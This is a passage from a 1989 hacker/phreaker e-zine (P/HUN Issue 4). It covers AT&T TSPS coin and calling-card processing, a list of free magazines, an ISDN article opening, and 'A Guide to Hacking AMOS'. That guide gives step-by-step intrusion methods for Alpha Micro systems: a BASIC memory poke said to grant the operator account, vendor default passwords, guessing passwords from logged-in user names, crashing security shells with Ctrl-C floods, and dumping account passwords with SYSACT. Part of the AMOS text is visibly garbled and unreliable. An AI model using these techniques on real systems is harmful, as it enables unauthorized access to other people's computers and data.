that postpay coin stations lack coin return equipment, and cannot return deposited coins (i.e.- Postpay stations do not have a coin hopper, only a coin box). This physical restriction requires the operator to verify that the correct party has been reached (and goes off-hook), before the customer makes any deposit. Upon verification, a type II CDA circuit is connected to count and monitor the coin deposits. This type of circuit is also connected whenever there is a large amount of change associated with the call. This is because the coin hoppers on standard payphones, can only handle limited deposits. If a deposit exceeds the hopper limit, an operator will be bridged to the circuit to make a series of partial collections. 6.3 SSAS Fully Automatic Criteria ================================== The SSAS fully automates 1+ coin station calls (ACTS) if and only if all of the following conditions are met. Failure to meet any of these conditions results in operator intervention. 6.3.1) ACTS Converted Trunk Group ================================== - Coin Stations must be converted to provide DTMF coin deposit signals that the CDA can recognize. 6.3.2) Machine Ratable ======================= - The TSPS must receive sufficient rating information; failure to do so will result in operator intervention. 6.3.3) Successful ANI ====================== - If ANIF or the call is ONI, an operator must be added to the circuit to record the calling number. 6.3.4 Cannot Be a Postpay Station ================================== - See previous explanation of postpay stations (6.2). 6.3.5 Cannot Have Large Charges ================================ - See previous explanation (6.2). 6.4 Fraud Detection and Prevention ================================== If a calling customer goes on-hook (hangs up), at the end of a conversation and charges are still due, TSPS automatically sends a ringback signal to that station in the attempt to get the customer to pick up the phone. If the calling party answers, an ACTS overtime charge message is made requesting the customer to deposit the remaining amount due. At any time during this message, an operator may be connected to the circuit and harass the customer for payment If however 5 rings with a 4 second interval occur without an off-hook state change, TSPS assumes a walkaway, and a registered traffic counter is flagged, a walkaway bit set, and the amount due is all registered as AMA data. Whenever the called party is off-hook, ACTS is susceptible to generated coin signals (Red Box Tones). In an attempt to prevent this fraud, a special type II CDA is employed: Two-wire trunks are isolated between forward and back party to monitor coin deposits. The talking path maintains conversation by being routed through the type II CDA. When coin signals are detected, the SSAS informs TSPS that a called party fraud is suspected. If more then one detection occurs on one call, TSPS flags a fraud indicator on the calls AMA record. NOTE:A trunk group may or may not detect and/or record this information depending on office criteria. 7.0 Calling Card Service and Billed Number Service =================================================== I am assuming that everyone reading this file has at least some concept of what a calling card is and how it would be utilized from a local office. The CCS and BNS services are implemented in TSPS by CCIS hardware, SSAS and several processing programs that will not be discussed in this file (ABEGN, ACALL, ASEQ...) The CCS and BNS together provide for the customer an automated credit card calling option that was initially implemented as an alternative to third party billing, collect and large change calls. In order for the CCS and BNS to function, they require that each TSPS becomes a node on the SPC network, which then allows access to a nationwide database of Billing Validation Applications (BVA). The BVA currently consists of nodes which are connected by CCIS, and are in turn made up of individual Billing Validation Files (BVF). A BVF is a file of data that is needed by the SPC and associated database software to process queries about the data. Each TSPS is integrated into the SPC network and uses the CCIS direct signaling to access the BVA. Connected in parallel to the BVA is the Network Call Denial (NCD), which allows the call denial to AT&T customers with outstanding bills. The CCS billing number consists of a 10 digit billing number and a 4 digit PIN. There are two categories that a CCS billing number can fall into and they are as follows: - 7.0.1) Directory Billing Number ================================= - The billing number is usually the directory number to which the card is billed, and is in the following format: NPA-NXX-XXXX : Where the NPA represents Numbering Plan Area, N is a digit 2-9, and X is a digit 0-9. - 7.0.2) Special Billing Number =============================== - Wheras the typical CCS billing number is discribed above in 7.0.1, here exists a special type of billing number that bills the card to a special nondirectory billing number. The format for this type of card is as follows: RAO-(0/1)-XX-XXXX : Where the RAO is the Revenue Accounting Office code which assigns the billing number. The X represents a digit 0-9. The PIN is a 4 digit number in the format of NYYY, where N is a digit 2-9, and Y a digit 0-9. Each PIN is designated upon assignment to the customer as either restricted or unrestricted. An unrestricted PIN can place calls to all destinations. If the called number is the same as the billing number, only the 4 digit PIN need be entered by the customer. A restricted PIN can only be used for station calls to the billing number. NOTE: A special billing number (section 7.0.2) can only have an unrestricted PIN. The CCS can be broken down into two basic category of calling types and are as follows: 7.1 Customer Dialed CCS Call ============================= The customer initiates the CCS sequence by dialing a 0 + Called Number. The Called number can take the format of a 7 digit number, a 14 digit number or 01+ country code and national number. This information, as well the calling number (originating) is received by TSPS from the CO. OST is then used to determine whether CCS is available/given to the customer. Based on the determined OST features (Does phone have Touch Tone? Is it a coin station?..), TSPS either routes the call to an operator or provides an alerting tone and announcement to prompt the customer for the CCS number (in the format discussed in sec 7.0). Assuming no operator intervention, the CCS number is subjected to a series of checks and queries detailed below. (sec 7.3) 7.2 Operator Dialed CCS Call ============================ There are several ways a customer can receive operator assistance in CCS dialing. - 7.2.1) 0- call. - 7.2.2) 0+ Called Number +0 - 7.2.3) 0+ Called Number +Switch-hook flash. - 7.2.4) 0+ Called Number +No Action. - 7.2.5) 0+ Called Number +OST feature information requiring operator intervention. Example: Call placed from rotary phone... - 7.2.6) 0+ octothorpe. A customer dials an octothorpe ( pound key "#") after the initial 0. When the position is seized if the operator determines that a CCS call is requested, the operator keys in the CCS number (or the PIN only) and call is subjected to a series for checks for validity, detailed below (sec 7.3) 7.2.1 Non-TSPS Dailed CCS Call =============================== The TSPS operators do not serve all CCS users. Non-TSPS operators and independent telephone companies also serve CCS customers, and must access the BVA for validity checks.(Examples: mobile,marine,international...) This access to the BVA is provided for cordboards and independent telephone companies by reaching a nearby TSPS, via TSPS base unit inward trunks. A distant operator may reach the BVA by any of the routing codes detailed in section 4.2.6, and the CCS validation is subject to the same security checks detailed below. If a non-TSPS operator dials either KP+(1161 or 1162)+ST, the operator hears a CCS alert tone, and then has one minute in which to dial the 14 digit CCS number. The TSPS initiates a format check, an APF check (see 7.3), and access the BVA to determine the status of the CCS number in question. The following are the different corresponding announcements which would follow: - Calling Card Service Number Accepted, PIN unrestricted - Calling Card Service Number Accepted, PIN restricted - Calling Card Service Number Accepted, RAO unknown - Calling Card Service Number Rejected If a CCS number is accepted, the connection to the non-TSPS operator is terminated by the TSPS. If a rejection message results, the operator will be prompted by the alert tone and may attempt to redial the CCS. 7.3 CCS Validation =================== After the CCS billing number is keyed in (either by customer, TSPS operator, or independent operator) the All PINs Fail (APF) feature may cause the card to be rejected and the call to be halted. The APF is a security feature designed to frustrate attempts at discovering valid PINs by a brute force hack method (trial and error). A list of CCS validation failures is maintained, which is updated with both invalid billing numbers and calling numbers. When a number of failures for a given billing number exceeds a specified threshold, in x amount of time, all subsequent attempts are declared invalid for a certain amount of time y (Lock Out Time). Even if the actual PIN is used during the lockout time, the CCS number would be considered invalid, and the call process would be halted. 7.4 Billed Number Screening ============================ The BNS service applies to collect and third party billing calls placed through a TSPS operator. The BVF contains information designating certain numbers as "collect denied" or "bill-to-third denied". Each time an operator attempts to place a collect or third party billing number a BVA and a NCD inquiry are made. 8.0 Busy Line Verification =========================== A dedicated network is provided to process BLV calls and traffic. This network originates at the TSPS base office and connects through dedicated trunks to toll, intertoll, and local offices. The equipment consists of the BLV trunk, a TSPS-4 wire bridging repeater, a verification circuit at TSPS, InComing Verification Trunks (ICVT), OutGoing Verification Trunks (OGVT) at both toll and intertoll offices, and Incoming No Test Trunks (INTT) at local offices. The TSPS gains access to a single local, toll, and/or intertoll office. The initial request for a BLV appears as an position seizure to a TSPS operator over an incoming trunk via a local office or as an inward trunk via a toll office. The initial loop seized becomes the originating loop and is connect in position via an idle TSPS loop. In that the originating loop cannot be connected to the verification loop, the operator must switch between the two. Security is maintained to insure that a customers privacy is not violated, and consists of the following: - 8.0.1) Speech Scrambler at Console Level (not BLV trunk level). - 8.0.2) Alert Tone Generator (ATG). - 8.0.3) Translation of the NPA to 0XX or 1XX. - 8.0.4) Dedicated BLV trunks. - 8.0.5) Cross office security checks at toll offices. 8.1 BLV Processing =================== When a customer requests that a BLV be preformed on a certain number within the TSPS's LAN the following actions are taken. - 8.1.1) The TSPS attempts to DDD the number in question , to confirm that the number is indeed busy. This action is preformed so that if in the event that an recorded error announcement is reached, the operator may understand the nature of the error without the speech scrambler interfering in quality. - 8.1.2) If the line is confirmed to be busy and the customer requests further action, the operator then attempts verification through the BLV network. The operator then presses the VFY key, in which case an attempt at a BLV will be made if and only if the following conditions are met: - 8.1.2.1) There is an idle loop at the position =============================================== - This condition must be met because the BLV trunk must be placed in a loop with the Traffic Service Position. If there are no idle loops remaining the BLV cannot be processed. This condition can be gotten around by the operator pressing the POS TRSFR key, which causes all the calls in the hold state to be transferred to loops on the original operator position. - 8.1.2.2) The call is on an incoming/inward trunk ================================================ - This insures that an operator cannot preform a BLV without a originating customer request. - 8.1.2.3) The called party is off-hook ====================================== - See 8.1.2.2 - 8.1.2.4) The called number is a domestic number ================================================ - That is the called number cannot be an overseas number. - 8.1.2.5) The call has no forward connection ============================================ - This ensures that the busy condition detected by the INTT is not due to the connection of the calling party. - 8.1.2.6) The line number can be verified ========================================= - This condition would fail if the local office is not served by the BLV network... - ..or the number in question is excluded from BLV calls (Example: Emergency or Police Lines...) 8.1.3) The BLV is preformed and the BLV trunk dropped by pressing the REC MSG key for an incoming call or VFY for an inward call. 9.0 Conclusion : Acknowledgements and References ================================================= I have assumed that the reader of this file has a general working knowledge of phone systems and their associated terminology. As it is impossible to please everyone, some readers will find this file too advanced while others will find it lacking in several areas...too bad. This file has intentionally *not* covered previously released information on TSPS found in files by other authors, in an attempt to provide the phreak/hack community with another source of information to be used in conjunction with the existing ones. The following reading list is highly recommend for furthering ones knowledge on TSPS, and is as follows: - Understanding TSPS Part 1: The Console - Written by The Marauder, LOD/H Technical Journal: Issue No. 1, file #4. - Busy Line Verification Part 1 - Written by Phantom Phreaker, Phrack Vol 2, Issue XI, file #10. - Busy Line Verification Part 2 - Written by Phantom Phreaker, Phrack Vol 2, Issue XII, file #8 - Telephony Magazine 9.1 Acknowledgements ===================== - Eastwind...the Man Behind the Garbage Can... - AT&T - My Local RBOC...and all of the Trash that's fit to print =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= P/HUN Issue #4, Volume 2: Phile 7 of 11 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 5/19/89 * Free Computer Magazines * 5/19/89 by + Southern Cross + _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ TPT Networking Management 1421 S. Sheridan P.O. Box 21728 Tulsa, OK 74101-9977 Computer Design Recommended P.O. Box 2389 Tulsa, OK 74101-9933 Scientific Computing & Automation Recommended 301 Gibraltar Drive P.O. Box 608 Morris Plains, NJ 07950-0608 Industrial Product Bulletin 301 Gibraltar Drive P.O.Box 650 Morris Plains, NJ 07950-0650 Computer Products 301 Gibraltar Drive P.O. Box 601 Morris Plains, NJ 07950-9813 Connect Journal of Computer Networking 3165 Kifer Rd. P.O.Box 58145 Santa Clara, CA 95052 Microcomputer Solutions Magazine Intel Corporation GRI-58 P.O. Box 58065 Santa Clara, CA 95052-8065 Evaluation Engineering 2504 North Tamiami Trail Nokomis, FL 34275-9987 Electronics Recommended P.O. Box No. 2713 Clinton, Iowa 52735 Systems Integration P.O. Box 5051 Denver, CO 80217 EDN Recommended P.O. Box 5262 Denver, CO 80217-9865 Computer Technology Review Recommended West World Productions, Inc. 924 Westwood Blvd., Suite 650 Los Angeles, CA 90024-2910 Microwave Journal Recommended 685 Canton Street Norwood, MA 02062 NASA Tech Briefs Recommended Associated Business Publications 41 E. 42nd St., Suite 921 New York, NY 10164-0672 Computer & Software News A Lebhar-Friedman Publication Grand Central Station P.O. Box 3119 New York, NY 10164-0659 Compliance Engineering Recommended 629 Massachusetts Avenue Boxborough, MA 01719-9974 Government Computer News P.O. Box 3705 McLean, VA 22103 Federal Computer Week 3110 Fairview Park Drive Falls Church, VA 22042-4599 Defense Electronics Recommended EW Communications, Inc. P.O. Box 50249 Palo Alto, CA 94303-9983 Defense Computing Recommended P.O. Box 5286 Pittsfield, MA 01203-5286 Laurin Publishing Co., Inc. Photonics Spectra P.O. Box 2037 Pittsfield, MA 01202-9925 Computer Graphics Review P.O. Box 12950 Overland Park, KS 66212-0950 Electronic Design Recommended VNU Business Publications P.O. Box 5194 Pittsfield, MA 01203-5194 Electronic Products Recommended P.O. Box 5317 Pittsfield, MA 01203-9899 Software Magazine Not Recommended P.O. Box 542 Winchester, MA 01890 Specialized Products Company Recommended 2117 W. Walnut Hill Lane Irving, TX 75038-9955 The LAN Catalog & Black Box Catalog Black Box Corporation P.O. Box 12800 Pittsburgh, PA 15241-9912 Computer-Aided Engineering A Penton Publication 1100 Superior Avenue Cleveland, OH 44197-8006 PERX (catalog) 1730 S. Amphlett Blvd., Dept. 222 San Mateo, CA 94402 Anasco (catalog) Commerce Center Building 42A Cherry Hill Drive Danvers, MA 01923-9916 MetraByte Corporation (catalog) Recommended 440 Myles Standish Blvd. Taunton, MA 02780 Micro Networks (A/D catalog) Recommended 324 Clark Street Worcester, MA 01606 Programmer's Connection 7249 Whipple Ave. NW North Canton, OH 44720 Burr-Brown Corporation (catalog) P.O. Box 11400 Tuscon, AZ 85734 WAVETEK San Diego (catalog) Recommended P.O. Box 85434 San Diego, CA 92138 Digi-Key Corporation (catalog) Recommended 701 Brooks Avenue South P.O. Box 677 Thief River Falls, MN 56701-0677 Consumertronics Co. (catalog) Recommended 2011 Crescent Drive, P.O. Drawer 537 Alamogordo, NM 88310 Time Motion Tools (catalog) 410 South Douglas Street El Segundo, CA 90245 EXAR Corporation (modem design catalog) 750 Palomar Ave. P.O. Box 3575 Sunnyvale, CA 94088 ATTN: Marketing Communications Chilton's Instrumentation & Control News Box 2006 Radnor, PA 19089-9975 Communications Week P.O. Box 2070 Manhasset, NY 11030 Computer Systems News CMP Publications, Inc. 600 Community Drive Manhasset, NY 11030 Electronic Engineering Times Circulation Dep't. Box 2010 Manhasset, NY 11030 Network World P.O. Box 1021 Southeastern, PA 19398-9979 Digital Review P.O. Box 40065 Philadelphia, PA 19106-9931 Digital News P.O. Box 593 Winchester, MA 01890-9953 DEC Professional P.O. Box 503 Spring House, PA 19477-0503 Macintosh News Circulations Dep't. P.O. Box 2180 Manhasset, NY 11030 UNIX Today! CMP Publications, Inc. 600 Community Drive Manhasset, NY 11030 LAN Times 122 East 1700 South P.O. Box 5900 Provo, UT 84601 Electronic Business 275 Washington Street Newton, MA 02158-1630 PCNetwork P.O. Box 457 Newton, NJ 07860 INFO World P.O. Box 5994 Pasadena, CA 91107 Reseller Management Not Recommended 301 Gibraltar Drive P.O. Box 601 Morris Plains, NJ 07950-9811 Computer Reseller News Not Recommended CMP Publications, Inc. 600 Community Drive Manhasset, NY 11030 This is a partial list of free computer magazines and newspapers of interest to the hacker/phreaker community. Just ask for a free subscription form, fill it out, and you'll have enough to read for a long time! (You also get to stay on top of the "state" of the art) The recommended mags have articles, products, schematics, and diagrams of particular interest and application for most of the community. (You'll find that they're an education unto themselve +SC+ Cruise Director S.S. Phuntastic (...lost in a sea of paper...) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + P/HUN Issue #4, Volume 2: Phile 8 of 11 + + DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD + + A Guide to Hacking AMOS + + ----------------------- + + By NightCrawler + +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ The Alpha Micro computer is a fairly easy system to understand, for those of you familiar with VAX systems. The operating system (AMOS) is a ripoff of the DEC stuff, so many commands are similar. This is a guide on how to use the Alpha. Background on security: ---------- -- --------- When the Alpha Micro leaves the factory, they do not have any type of security feature built into it, except for certain higher end models, which will be discussed later. Thus, if the user installs a modem directly to the system, and you call in, you'll be at the OS level already. Pretty easy, eh? Due to the lack of a cursor display character, the pound sign (#) will be used to represent the cursor throughout this document. The prompt for AMOS is a period, which users refer to as the dot. Wnen you log on, you'll see this: .# At this point, you can type away and use the various accounts and programs on the system. When you first connect, depending on how the last user left the modem, you may or may not be logged in to a partition. To verify this, type in the LOG command. .LOG The computer will respond in one of two fashions. If it says "Not logged in", then you will have to log to an existing account. If it says "Current login is DSK1:[203,1]", then there is no need to scan for an account right away. Perhaps the most important thing to do after this is to do a SYSTAT, which will let you know who else is on the system, and what account, program is being run, and other info. Example: .SYSTAT Status of AMOS/L version 1.3D(165) on Friday, November 11, 1988 03:24:54 PM JOB1 TRM1 DSK1:201,3 0067732 ^C CONECT 122880 bytes at 4505554 JOB2 TRM2 DSK0:1,2 0024984 TI SYSACT 176800 bytes at 4505554 JOB3 TRM3 Not logged 0015460 ^C MEMORY 12288 bytes at 3137554 MODEM HAYES DSK0:1,4 0037325 SL SYSTAT 67912 bytes at 2179023 4 jobs allocated on system, 3 jobs in use (3 logged in) Total memory on system is 2048K bytes System uptime is 07:28:19 DSK0 26402 blocks free DSK1 3578 blocks free 4 devices on system, total of 29980 blocks free .# Here's a quick rundown on what each column means... Col 1: The name of the job Col 2: The terminal to which the job is attached Col 3: The device and account into which the job is logged Col 4: The octal memory address where the JCB is located Col 5: Terminal status of for that job Col 6: Last program run by that job Col 7: Number of bytes (decimal) of memory allocated Col 8: Octal memory address for beginning memory partition The rest is self explanatory. The 5th column (terminal status) has numerous codes which need to be given. Here's the abbreviation and what it stands for: TI Terminal input wait state TO Terminal output wait state LD Program load state SL Sleep state IO I/O access other than terminal EW External wait state RN Running SP Suspended state SW Semaphore wait ^C Control-C The SYSTAT program can be used even when you are not logged in, which is a plus if you wish to access an account without knowing the password. There is another program, called STAT, but don't use this. It constantly updates the screen, and will mess you up if you're using a modem. Before going further, it should be mentioned on how the Alpha Micro computer is structured. On each system, a number of hard drives subdivided into logical units are encountered. These may be named in any fashion by the sysop, following only the limitation of the LU being three letters or less in length. This is then followed by the device number. Sample LU's may look like: DSK0:, DSK1:, WIN0:, HWK3:, etc. On each disk is found a grouping of accounts, also known as partitions, or PPN's (project, programmer number). It is in these accounts where you log in to, and execute programs. These are enclosed in square brackets [], to separate them from the disk specification. When used all togther, it looks like this: DSK0:[1,2], DSK0:[1,4], WIN3:[100,0], DSK4:[377,7] System Commands: ------ --------- When in doubt, type HELP. This will give you some online information the system you are currently logged in to. Below are a list of some of the more common commands that you can use. ASCDMP -- displays the data in physical bocks in ASCII form. ATTACH -- connects a job to a terminal. BASIC -- places you in interactive BASIC mode. BATCH -- loads frequently used commands to your memory partition. BAUD -- change the baud rate of your terminal. CAL100 -- allows you to calibrate the clock oscillator. CLEAR -- write zeroes to all free disk blocks. COMPIL -- use this to compile BASIC programs. COPY -- copies one or more files between accounts or disks. CREATE -- creates a random file of specified size (any size!!). CRT610 -- verifies quality of videocasstte backup media. DATE -- returns with current system date. DING -- rings the terminal bell. DIR -- gives a directory listing for specific files or accounts. DIRSEQ -- alphabetizes all current entries in an account. DSKANA -- analyzes the data on a disk, and reports errors. DSKCPY -- copies contents of one disk and places on another disk. DSKDDT -- allows you to examine and change data directly on disk. DSKPAK -- packs the blocks in use to create area of free blocks. DUMP -- display file contents & memory to the screen. ERASE -- deletes one or more files from disk. ERSATZ -- displays the currently defined ersatz names. FIX -- disassemble assembler (.LIT) code. FORCE -- allows you to send terminal input to another job. HELP -- displays all available help files for the system. JOBALC -- displays your job name. JOBPRI -- determine your job priority, and change other's priority. JOBS -- shows all jobs on system, and how many are in use. KILL -- kill the program being run by another job, or a single job. LNKLIT -- creates ML programs by linking object code files. LOAD -- loads disk files into your memory partition as mem modules. LOG -- logs you into an account so you can access the files there. LOGOFF -- logs you out of the account you were logged into. MAKE -- creates the first record of a SEQ file (make a bogus file). MEMORY -- allocates memory to your job (e.g. .MEMORY 64K). MONTST -- tests the system monitor by bringing up the system new. MOUNT -- see which disks are on the system. Do a /U to unmount a disk. M68 -- assemble an assembler program to an unlinnked ML file. PASS -- allows you to change your account password. PPN -- displays a list of all accounts on a logical device (eg DSK0:). PRINT -- send one or more files to a printer. QDT -- allows you to examine and modify locations in memory. REBOOT -- reboots the system after hitting RETURN. REDALL -- diagnostic test that looks at disk & reports read errors. RENAME -- rename files in an account from one name to another. RUN -- runs a compiled BASIC program. SAVE -- save memory modules as disk files. SEND -- send messages to other terminals on the system. SET -- set terminal handling options for your terminal. SLEEP -- put your job to "sleep" for a period of time. SORT -- alphabetically & numerically sort data in a SEQ file. STAT -- displays & continually updates status of all system jobs. SUBMIT -- used to enter, change, or delete files from task manager. SYSACT -- used to change account passwords, or initialize a disk. SYSTAT -- mentioned above. TIME -- displays or sets the time of day. TRMDEF -- gives information about the system terminals. TYPE -- displays a text file to the screen (use the /P switch). VCRRES -- read files from videocassette to disk. VCRSAV -- save files from disk to videocassette. VER -- gives you version of current operating system level. VUE -- create and enter text editor. Use ESCape to toggle modes. You have to be careful with how the programs are used. If done inappropriately, you could do major damage to the computer. Many of the above programs can only be executed from the operator account DSK0:[1,2]. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Entering via BASIC: There is a back door in the version of BASIC that comes bundled with AMOS. Depending on the type of security present, you can gain access to the system operator account (DSK0:[1,2]), which gives you the power to do quite a few things. What the command essentially does is poke into memory the appropriate values to give you sysop access. Type this in at the dot prompt (.) : .BASIC AlphaBASIC Version 1.3 (217) READY # Once inside BASIC, type in this command as seen below; it doesn't matter if you use upper or lower case. WORD(WORD(1072)+20)=258 BYE .# The BYE command exits you out of BASIC and puts you back at the OS level. You can also rename files and open files via BASIC. Depending on the security in the system, if you typed in everything as above, you should be logged into DSK0:[1,2], also known as OPR:. This is the system operator's account, from which all types of commands can be issued. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ When you finally get connected to the system, you need some place to log in to. There are certain default accounts on every system. These are: OPR: --> DSK0:[1,2] SYS: --> DSK0:[1,4] DVR: --> DSK0:[1,6] CMD: --> DSK0:[2,2] LIB: --> DSK0:[7,0] HLP: --> DSK0:[7,1] BOX: --> DSK0:[7,2] BAS: --> DSK0:[7,6] MAC: --> DSK0:[7,7] While logging around to the different accounts, some will have defined "ersatz" names. This means that besides the [p,pn] specification, you can access that account with a defined name. In the above examples, logging into SYS: is the same as logging into DSK0:[1,4]. As mentioned previously, older models of the Alpha Micro did not have any security built in to them. Later versions of the operating have changed this, though. Once you get connected and you try to log into an account, you may be asked for a password. The word you type is not echoed on your screen. Two default passwords that you can try for logging purposes are "DEMO" and "SYSTEM SERVICE". These are not case-sensitive, so you can type them in either upper or lower case. If neither of these work (which is unlikely, since people are too lazy to change them), try running the SYSTAT command. What happens is that you will often see people logged in under a short (6 digits or less) user name, such as JOHN, AMY, SUSAN, etc. Try logging in with one of these as your PW. 80 per cent of the time it will work. If you've gotten into the system this far, then good. There are lots of things to do or access. If you're looking around for information, these are contained in files that end in a .TXT extension. These may be examined by using the TYPE command from AMOS. The syntax would be: .TYPE MODEM.TXT/P The /P is not required, but is useful, because otherwise the file would be diaplayed too quickly for you to look at. The /P switch displays the contents one page at a time. Pressing will scroll through the text. One word of warning: Don't use the TYPE command on .LIT, .SBR, or .OBJ files; doing so will usually result in your terminal being locked up, effectively ending your session. Now let's say you wanted to check out the files that are in other accounts. Usually all that is needed is to simply log there. However, certain accounts will be passworded. There is no simple way to just dump the contents of a disk block and see what the PW is. There are alternatives, however. One method is to log into the operator account (DSK0:[1,2]) and use the SYSACT command. This lets you to various things to the disk, but the one you would be concerned about lists all of the accounts on a parti- cular disk. The command works like this: .# .SYSACT DSK0: Use the "H" to get a listing of all the available commands from within SYSACT. * *h Implemented commands are: A PPN - Add a new account C PPN - Change password of an account D PPN - Delete an account E - Rewrite MFD and exit to monitor H - Help (Print instructions) I - Initialize entire disk L - List current accounts The last one "L" is the one we're concerned with. Press after it to see a listing of all the accounts on the disk. Passwords (if any) will be displayed to the right. The "C" option will allow you to change the PW on an individual account. Then press "E" to go back to the command level. If you want to check out a file a little less elegantly, this may be done by simply copying the file to an unpassworded account or by typing the file from another account. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Account and file structure: As explained before, there are accounts on the disk, which may or may not contain files in them. AMOS maintains this account structure on the disk. In fact, a listing of which files belong in what account are kept track of in the account directory. There are two types of files that are possible on the Alpha Micro: sequential (linked) and random (contiguous) files. Each block is 512 bytes y. Files may not overlap onto another disk, and each disk block has a unique number by which it is referenced to via AMOS. The format of most Alpha files are sequential -- AMOS reads in each disk block of the file, which tells it the disk address of the next disk block. The key point is that to access one block of data, you have to access all preceding blocks. When AMOS writes a sequential file to the disk, it looks for the first free disk block. It writes a copy of the first file block into that disk location. Next, it looks for another free disk block. This next disk block may or may not be anywhere near the first block used. This process goes on until the entire file is transferred to the disk. The disk blocks that make up the file may be scattered across the disk. Each disk block in the file contains a portion of the file; it also contains the address of the next disk block used by the file. *-----------*-----------* | Address of| Data in | | next block| file block| *-----------*-----------* Sequential files are also called linked files because the disk blocks are linked together by the information in each block that points to the address of the next disk block. The last block in the file is designated as such by a link of zero. It looks like this: /---X /----------------X /----------------X ! | ! ! ! ! ! X *-----------*--------* ! *-----------*--------* ! *----------*-------* | Address of| DATA | ->| Address of| DATA | !->| EOF | DATA | | next block| | | next block| | | Zero link| | *-----------*--------* *-----------*--------* *----------*-------* Random files differ from their sequential counterparts because the data in them can be accessed randomly. AMOS knows how long the files are, and also knows exactly where the files begin on the disk. The operating system can therefore access any block in a file by computing an offset value from the front of the file, and then reading the proper disk location. The distinc- tion between random and sequential is that since the disk blocks don't have to be accessed in any particular order, AMOS can locate specific data in a file quicker. When a random file is written to disk, the first free groups of contiguous blocks are searched for which are large enough to hold the entire file. If there aren't enough blocks on the disk, the message "Disk full" appears. Random files look something like this: *---------------*---------------*---------------*---------------* | File block #1 | File block #2 | File block #3 | File block #4 | *---------------*---------------*---------------*---------------* One a random file is allocated on the disk, it is not possible to expand it. Random files are used mainly for applications where the file length remains constant. The first block on a disk (block 0) is the disk ID block. Alpha Micros use this disk block to maintain permanent identification information about the disk. The next block (block 1) is the Master File Directory (MFD). At block 2 lies the disk bitmap. The bitmap is the structure that keeps track of which blocks on the disk are in use, and which are available. The bitmap contains one bit for each block on the disk. If a block is in use, the bit in the bitmap that represents that disk block is a 1; if the block is available for use, its bit in the bitmap is a 0. The bitmap is perma- nently stored on the disk beginning with block 2 and extending as far as necessary. The last two words in te bitmap form a hash total. If some data in the bitmap becomes destroyed, then there is a chance that data corruption has occurred. The ocre for writing data to the disk is: [1] Find in memory a copy of the bitp of the disk to be accessedd. [2] Computer the hash total of the bitmap & check agains the sh. [3] Consult bitmap to see the next free block. [4] Change bitmap to shockthe block is in use. [5] Recompute bitmap hash to reflect the modified bmap. [6] Write modified bitmap back out to the disk. [7] Write thata to the chosen block. Every disk contains one Master File Directory (MF Each disk contains one MFD. The MFD is one block long, and contains e entry of four words for each user account allocated on that disk. This ps the limitation of having a maximum of 63 user accounts per disk. Each try in the MFD identifies a specific acct directory. Individual account dectories are known as User File Directories (UFDs). The entry contains thccount PPN, number of the first block used by the UFD, and a password assned (if any). The MFD contains one entry for every UFD on the disk.One UFD exists for each user account; it contains one entry for eachlein that account. These contain various sorts of information relating tthe file. A UFD may consist of more than one disk block; if it is larger than oblock, the first word of the FD is nzero and gives the link to the next UFD bock. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Since the existing security the Alpha Micro is lax, third party comiehave wriiten their own sceurity systems, making it considerably more dicult to access a system. However, all is not lost. There are a few wato make things easier. Default passwords are the first step. One of the security systems, known as TSASS, has the default passwords of MAL, MAL, MAL for its prompts. You will know that you've encounted an Alpha Micro running TSASS by the message: "Welcome to a Time Shar and Security System". Another security package, UltraSafe, has the dult PW's of OPR, OPR, OPR. An UltraSafe system is harder to recognize because the prompts can be changed, although some more common ones ask for NAME, PORD, and GROUP. The next option is if you have found a password that lets you in, it may be one of low security. This can automatically chain you into a menu or shell program. Depending onw the system is configure, a string of Control C'or any other key sequence) can mess up the buffer, automatically causing e curity system to crash, and bringing you to AMOS, without being confined to the security program. The input must be typed in rapidly, or it won't work. This method works for both TSASS and UltraSafe. Note: This file is written for informational purposes oy, to give you an idea of the workings of computer security for the Al Micro Operating System (AMOS). If you want more information on the inner workings of this operating system, then get in touch with me. Nightcrawler out! =============================================================================== $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ P/HUN Issue #4 $ $ Volume 2: Phile 9 of 11 $ $ $ $ $ $ USDN VERSUS ISDN $ $ ---------------- $ $ $ $ by $ $ $ $ $ $ LORD MICRO $ $ ********** $ $ $ $ TOLL CENTER BBS - (718)-358-9209 $ $ A 2600 MAGAZINE BBS $ $ $ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ PREFACE: The integrated services digital network (ISDN) is a long-range plan for systematically upgrading the televommunications networks of various countries to provide both voice and data services on a single physical network. European countries have been the major force behind degining ISDN. The U.S. however, will require a variant of ISDN, because its communications industry operates in a competitive user-oriented environment. This article describes the differences in implementation and services that can be expected with USDN (the U.S. version of ISDN) and identifies unresolved issues that should concern the data communications manager. INTRODUCTION ------------ The ISDN proposal has recieved worldwide attention for at least a decade. Constrained by an apathetic marketplace, technical limitations, economic considerations, and the slow pace involved in establishing acceptable world-wide standards, implementation of ISDN has occured principally in laboratories only. The International Telegraph and Telephone Consultative Committee (CCITT) has attempted to define and obtain general consesus regarding ISDN objectives, interfaces, services, and standards. The CCITT-backed ISDN principally represents European interests. Although the U.S. is repre- sented in the CCITT and offers support for its programs, the major telecommunications organizations in the U.S. are more interested in estab- lishing their own standards and programs. So, while ISDN seems to be gaining more U.S. support, it continues to reflect a European perspective. Recently, the term USDN has been used to distinguish the modifications to ISDN that are expected to evolve in the U.S. The USDN concept is one of integrated access to multiple networks, rather than the integrated services on one network approach of the ISDN proposal. The U.S. telecommunications industry has long recognized that ISDN would have a somewhat modified personality in the U.S. Several industry-wide ISDN conferences addressed the U.S. equivalent to ISDN, 